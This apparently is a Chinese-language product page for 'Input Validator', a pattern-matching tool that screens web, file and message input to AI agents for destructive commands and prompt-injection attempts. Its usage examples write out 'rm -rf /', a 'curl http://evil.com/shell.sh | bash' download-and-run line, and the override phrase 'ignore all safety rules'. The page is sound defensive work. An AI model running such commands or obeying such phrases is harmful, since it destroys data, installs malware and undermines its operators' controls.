Input Validator

温和的输入验证器,检测网页/文件/消息中的恶意内容。支持危险内容阻止和可疑内容警告,不影响正常使用。

安装

概览

什么是Input Validator

Input Validator 是一款专为 AI Agent 设计的温和输入验证工具,旨在检测来自网页、文件、消息等渠道的潜在恶意内容。其核心理念是‘温和、简单、不破坏现有功能’,在保障安全性的同时不影响正常的交互体验。该工具通过模式匹配技术识别两类风险:一类是明确的危险指令(如系统删除命令、反弹 shell),会直接阻止执行;另一类是可疑内容(如 Prompt Injection 尝试、越狱指令),则会发出警告提示用户注意。这种分层处理机制使得 AI 在处理外部输入时既能防范安全风险,又不会过度限制合法请求。 Input Validator 的检测逻辑清晰高效,首先对输入内容进行危险内容扫描,若发现高危指令立即拦截;若无危险项,则进一步检查可疑模式。整个过程可在 50ms 内完成,误报率和漏报率均低于 1%,内存占用不足 5MB,性能表现优异。工具支持文本、文件和 URL 内容等多种输入方式,并提供了灵活的集成接口,可轻松嵌入到 web_fetch、文件上传、RSS 订阅等常见技能中,实现端到端的安全防护。 作为一款轻量级但功能完备的安全组件,Input Validator 特别适用于需要频繁处理外部数据的智能代理场景。无论是用户提供的链接、上传的文件,还是自动抓取的网络内容,都可以通过它进行前置过滤,显著降低因恶意输入导致系统受损或数据泄露的风险。其设计哲学强调‘专业证明’而非‘过度防御’,让每一次内容验证都体现 AI 系统的可靠与可信。

核心功能特点

  1. 检测网页、文件及消息中的恶意内容,支持危险内容自动阻止和可疑内容预警
  2. 采用分层检测机制:先拦截高危指令(如删除命令、反弹 shell),再标记可疑行为(如越狱尝试)
  3. 高性能低开销,单次验证耗时小于 50ms,内存占用低于 5MB,误报率与漏报率均控制在 1% 以内
  4. 提供 Python API 接口,可无缝集成至 web_fetch、文件上传、RSS 订阅等常用技能模块
  5. 支持自定义规则扩展,允许用户添加新的危险或可疑内容检测模式以适应特定需求

适用场景

Input Validator 最典型的应用场景是在 AI 接收到外部输入后,对其内容进行安全审查。例如当用户分享一个网页链接时,AI 可先调用 web_fetch 获取页面内容,再通过 Input Validator 验证是否存在恶意脚本或危险指令。如果检测到 rm -rf / 这类命令,将立即阻止后续操作并返回警告;若仅发现‘忽略所有安全规则’等可疑语句,则会提示风险但仍允许继续处理。这种机制有效防止了因用户误传或恶意诱导而导致系统被攻击。 另一个高频使用场景是文件处理环节。当用户上传文本文件(如日志、配置文件或代码片段)时,AI 可读取内容并通过 Input Validator 快速筛查。比如某个文件中包含 curl http://evil.com/shell.sh | bash 这样的下载执行命令,工具会在几毫秒内识别并终止操作,避免潜在的木马植入。即使面对看似无害的技术讨论或正常请求,系统也能保持警惕,确保任何异常指令都不会绕过防线。 此外,在自动化流程中也发挥着重要作用。例如 RSS 阅读器定期抓取新闻源或博客更新前,可先用 Input Validator 预检内容安全性;API 响应返回后也可即时验证,防止后端服务接收非法参数。这些场景共同体现了 Input Validator 作为‘第一道防线’的价值——它不追求绝对完美,而是以最小代价实现最大安全保障,让 AI Agent 在面对复杂多变的外部环境时依然稳健运行。